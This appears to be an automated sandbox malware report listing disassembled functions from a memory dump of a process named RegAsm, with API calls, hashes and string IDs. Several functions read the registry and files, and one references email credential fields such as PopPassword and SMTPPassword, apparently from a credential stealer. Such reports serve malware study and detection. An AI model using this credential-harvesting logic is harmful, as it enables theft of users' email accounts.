                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                                                      Function 00402B22 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                                        • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1880195650-0
                                                                                                                                                                                                                      • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                                                      • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                                                                                                      Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                                      Function 004029A2 Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1208763047-0
                                                                                                                                                                                                                      • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                                                      • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                                                                                                      Function 00402A9D Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                                        • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$EnumOpen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1938129365-0
                                                                                                                                                                                                                      • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                                                      • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                                                                                                                                                                                                                      Function 00404734 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 534179979-0
                                                                                                                                                                                                                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                      Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                      Function 00410B62 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Enum
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2928410991-0
                                                                                                                                                                                                                      • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                                                      • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                                                                                                      Function 00410ADD Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                                                                      • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                                                      • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                                                                                                      Function 00407560 Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                                                      • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                                                                                                      Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                      Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                      Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                      Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                      Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                                      Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                                                                                      Function 00407CBC Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                                                                                                      • free.MSVCRT ref: 00407D7C
                                                                                                                                                                                                                        • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3401966785-0
                                                                                                                                                                                                                      • Opcode ID: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                                                                                                      • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                      • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                      • API String ID: 52435246-1534328989
                                                                                                                                                                                                                      • Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                                                      • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                                                                                                      Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
